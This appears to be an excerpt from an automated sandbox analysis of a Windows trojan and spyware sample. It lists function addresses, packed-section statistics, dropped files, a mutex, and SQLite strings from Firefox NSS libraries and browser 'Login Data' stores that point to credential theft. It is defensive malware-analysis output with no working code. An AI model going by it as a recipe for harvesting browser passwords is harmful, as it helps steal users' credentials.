Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C916CF0 7_2_6C916CF0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8DD4E0 7_2_6C8DD4E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C915C10 7_2_6C915C10
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C922C10 7_2_6C922C10
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C94AC00 7_2_6C94AC00
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C94542B 7_2_6C94542B
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C94545C 7_2_6C94545C
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8E5440 7_2_6C8E5440
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C910DD0 7_2_6C910DD0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9385F0 7_2_6C9385F0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C900512 7_2_6C900512
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8EFD00 7_2_6C8EFD00
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8FED10 7_2_6C8FED10
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C93E680 7_2_6C93E680
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8F5E90 7_2_6C8F5E90
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C934EA0 7_2_6C934EA0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9476E3 7_2_6C9476E3
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8DBEF0 7_2_6C8DBEF0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8EFEF0 7_2_6C8EFEF0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C917E10 7_2_6C917E10
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C925600 7_2_6C925600
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C939E30 7_2_6C939E30
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C913E50 7_2_6C913E50
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8F4640 7_2_6C8F4640
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C922E4E 7_2_6C922E4E
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8F9E50 7_2_6C8F9E50
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C946E63 7_2_6C946E63
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8DC670 7_2_6C8DC670
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9277A0 7_2_6C9277A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C906FF0 7_2_6C906FF0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8DDFE0 7_2_6C8DDFE0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C917710 7_2_6C917710
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8E9F00 7_2_6C8E9F00
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9060A0 7_2_6C9060A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9450C7 7_2_6C9450C7
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8FC0E0 7_2_6C8FC0E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9158E0 7_2_6C9158E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8E7810 7_2_6C8E7810
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C91B820 7_2_6C91B820
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C924820 7_2_6C924820
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8F8850 7_2_6C8F8850
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8FD850 7_2_6C8FD850
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C91F070 7_2_6C91F070
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C915190 7_2_6C915190
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C932990 7_2_6C932990
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C90D9B0 7_2_6C90D9B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8DC9A0 7_2_6C8DC9A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8FA940 7_2_6C8FA940
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C92B970 7_2_6C92B970
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C94B170 7_2_6C94B170
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8ED960 7_2_6C8ED960
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C94BA90 7_2_6C94BA90
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C942AB0 7_2_6C942AB0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8D22A0 7_2_6C8D22A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C904AA0 7_2_6C904AA0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8ECAB0 7_2_6C8ECAB0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C918AC0 7_2_6C918AC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C91E2F0 7_2_6C91E2F0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8F1AF0 7_2_6C8F1AF0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C919A60 7_2_6C919A60
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8DF380 7_2_6C8DF380
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9453C8 7_2_6C9453C8
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C91D320 7_2_6C91D320
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8D5340 7_2_6C8D5340
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C8EC370 7_2_6C8EC370
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9DECD0 7_2_6C9DECD0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C97ECC0 7_2_6C97ECC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA5AC30 7_2_6CA5AC30
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA46C00 7_2_6CA46C00
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C98AC60 7_2_6C98AC60
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C984DB0 7_2_6C984DB0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA16D90 7_2_6CA16D90
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CB0CDC0 7_2_6CB0CDC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CB08D20 7_2_6CB08D20
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA4ED70 7_2_6CA4ED70
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAAAD50 7_2_6CAAAD50
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA06E90 7_2_6CA06E90
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C98AEC0 7_2_6C98AEC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA20EC0 7_2_6CA20EC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA60E20 7_2_6CA60E20
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA1EE70 7_2_6CA1EE70
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC8FB0 7_2_6CAC8FB0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C98EFB0 7_2_6C98EFB0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA5EFF0 7_2_6CA5EFF0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C980FE0 7_2_6C980FE0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C986F10 7_2_6C986F10
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC0F20 7_2_6CAC0F20
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA42F70 7_2_6CA42F70
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9EEF40 7_2_6C9EEF40
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA868E0 7_2_6CA868E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA0A820 7_2_6CA0A820
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9D0820 7_2_6C9D0820
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA54840 7_2_6CA54840
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA109A0 7_2_6CA109A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA3A9A0 7_2_6CA3A9A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA409B0 7_2_6CA409B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA9C9E0 7_2_6CA9C9E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9B49F0 7_2_6C9B49F0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9D6900 7_2_6C9D6900
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9B8960 7_2_6C9B8960
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9FEA80 7_2_6C9FEA80
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA38A30 7_2_6CA38A30
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA2EA00 7_2_6CA2EA00
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9FCA70 7_2_6C9FCA70
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA20BA0 7_2_6CA20BA0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA86BE0 7_2_6CA86BE0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAAA480 7_2_6CAAA480
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9C64D0 7_2_6C9C64D0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA1A4D0 7_2_6CA1A4D0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA0A430 7_2_6CA0A430
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E4420 7_2_6C9E4420
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C998460 7_2_6C998460
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9745B0 7_2_6C9745B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA4A5E0 7_2_6CA4A5E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA0E5F0 7_2_6CA0E5F0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA20570 7_2_6CA20570
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9D8540 7_2_6C9D8540
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA84540 7_2_6CA84540
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC8550 7_2_6CAC8550
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E2560 7_2_6C9E2560
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA1E6E0 7_2_6CA1E6E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9A46D0 7_2_6C9A46D0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9DE6E0 7_2_6C9DE6E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9DC650 7_2_6C9DC650
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9AA7D0 7_2_6C9AA7D0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA00700 7_2_6CA00700
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C978090 7_2_6C978090
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA5C0B0 7_2_6CA5C0B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9900B0 7_2_6C9900B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA4C000 7_2_6CA4C000
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA48010 7_2_6CA48010
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9CE070 7_2_6C9CE070
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9801E0 7_2_6C9801E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA64130 7_2_6CA64130
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9F6130 7_2_6C9F6130
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E8140 7_2_6C9E8140
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA522A0 7_2_6CA522A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA4E2B0 7_2_6CA4E2B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CB062C0 7_2_6CB062C0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA58220 7_2_6CA58220
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA4A210 7_2_6CA4A210
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA08260 7_2_6CA08260
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA18250 7_2_6CA18250
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9DE3B0 7_2_6C9DE3B0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9B23A0 7_2_6C9B23A0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9D43E0 7_2_6C9D43E0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9F2320 7_2_6C9F2320
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA9C360 7_2_6CA9C360
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA16370 7_2_6CA16370
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C988340 7_2_6C988340
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC2370 7_2_6CAC2370
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C982370 7_2_6C982370
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA41CE0 7_2_6CA41CE0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CABDCD0 7_2_6CABDCD0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C991C30 7_2_6C991C30
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C983C40 7_2_6C983C40
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAA9C40 7_2_6CAA9C40
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C973D80 7_2_6C973D80
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAC9D90 7_2_6CAC9D90
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA51DC0 7_2_6CA51DC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9E3D00 7_2_6C9E3D00
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9A3EC0 7_2_6C9A3EC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA8DE10 7_2_6CA8DE10
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CB05E60 7_2_6CB05E60
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CADBE70 7_2_6CADBE70
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9A1F90 7_2_6C9A1F90
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA2BFF0 7_2_6CA2BFF0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CA9DFC0 7_2_6CA9DFC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CB03FC0 7_2_6CB03FC0
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6CAD7F20 7_2_6CAD7F20
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C975F30 7_2_6C975F30
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: String function: 6C90CBE8 appears 134 times
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: String function: 6C9194D0 appears 90 times
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: String function: 6C9A9B10 appears 73 times
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: String function: 6CAB9F30 appears 31 times
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: String function: 6C9A3620 appears 72 times
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: ZLIB complexity 0.9994770321038251
Source: file.exe Static PE information: Section: gmovqjaa ZLIB complexity 0.9943861573657365
Source: explorti.exe.0.dr Static PE information: Section: ZLIB complexity 0.9994770321038251
Source: explorti.exe.0.dr Static PE information: Section: gmovqjaa ZLIB complexity 0.9943861573657365
Source: random[1].exe.6.dr Static PE information: Section: ylafldxq ZLIB complexity 0.9947574327422807
Source: eb98fe5174.exe.6.dr Static PE information: Section: ylafldxq ZLIB complexity 0.9947574327422807
Source: 53c7d901f1.exe.6.dr Static PE information: Section: ylafldxq ZLIB complexity 0.9947574327422807
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@98/516@20/12
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C937030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 7_2_6C937030
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Roaming\1000051000\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: eb98fe5174.exe, eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: eb98fe5174.exe, 00000007.00000002.2670979145.000000006CB0F000.00000002.00000001.01000000.0000000E.sdmp, eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.7.dr, nss3.dll.7.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: eb98fe5174.exe, 00000007.00000003.2493810088.000000001D3B8000.00000004.00000020.00020000.00000000.sdmp, HDAFIIDAKJDGDHIDAKJJ.7.dr, Login Data.13.dr, Login Data.21.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: eb98fe5174.exe, 00000007.00000002.2668816890.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, eb98fe5174.exe, 00000007.00000002.2654833757.000000001D4FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.7.dr, softokn3.dll.7.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
